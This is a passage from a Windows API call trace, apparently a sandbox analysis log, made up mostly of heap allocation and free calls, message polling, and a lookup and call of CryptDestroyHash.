out: hHeap=0x970000) returned 1 [0211.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0211.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0211.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0211.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0211.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0211.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0211.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0211.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0211.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0211.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0211.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0211.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0211.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0211.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0211.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0211.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0211.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0211.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0211.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0211.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0211.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0211.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977908 | out: hHeap=0x970000) returned 1 [0211.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0211.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0211.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0211.503] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0211.503] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0211.503] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0211.503] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0211.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0211.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0211.504] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0211.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0211.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0211.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a08 [0211.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0211.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0211.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0211.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0211.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0211.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0211.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b08 [0211.504] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b08 | out: hHeap=0x970000) returned 1 [0211.504] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0211.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0211.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0211.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0211.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0211.504] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0211.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0211.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0211.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0211.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0211.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0211.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0211.505] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0211.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0211.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0211.505] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0211.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0211.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ba8 [0211.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ba8 | out: hHeap=0x970000) returned 1 [0211.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0211.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0211.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0211.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50908 [0211.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50740 [0211.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50980 [0211.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0211.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507a0 [0211.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0211.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0211.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506c8 [0211.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50860 [0211.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50710 [0211.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0211.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50788 [0211.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0211.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0211.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508a8 [0211.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0211.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50938 [0211.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50950 [0211.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0211.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50aa0 [0211.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e509e0 [0211.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0211.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ab8 [0211.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50c98 [0211.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0211.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0211.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0211.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0211.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0211.507] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0211.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0211.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0211.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50c50 [0211.508] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0211.508] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0211.508] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0211.508] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0211.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0211.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0211.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0211.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0211.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0211.508] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0211.508] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0211.508] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0211.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0211.508] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0211.508] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0211.508] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0211.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0211.508] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0211.508] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0211.508] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0211.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0211.508] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0211.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0211.508] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0211.508] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0211.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0211.508] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0211.508] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0211.509] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0211.509] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0211.509] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0211.509] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0211.509] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0211.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0211.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0211.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0211.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0211.509] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0211.509] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0211.509] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0211.509] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0211.509] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0211.509] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0211.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0211.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0211.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0211.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0211.509] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0211.509] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0211.509] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0211.509] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11) returned 0x2e699e8 [0211.510] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e699e8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0211.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0211.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0211.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0211.510] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyHash") returned 0x756ff0e0 [0211.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0211.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0211.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0211.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0211.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0211.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0211.510] CryptDestroyHash (hHash=0xa87250) returned 1 [0211.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0211.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0211.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0211.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0211.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0211.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0211.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0211.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0211.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0211.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0211.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0211.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0211.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0211.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0211.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0211.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0211.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0211.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0211.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0211.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0211.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0211.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0211.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0211.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0211.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0211.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0211.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0211.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0211.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0211.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0211.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0211.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0211.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0211.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0211.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0211.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0211.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0211.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0211.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0211.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0211.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0211.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0211.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0211.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0211.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0211.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0211.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0211.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0211.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0211.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0211.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0211.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0211.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0211.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0211.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0211.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0211.513] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0211.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0211.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0211.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0211.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0211.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0211.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0211.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0211.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0211.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0211.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0211.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0211.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0211.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 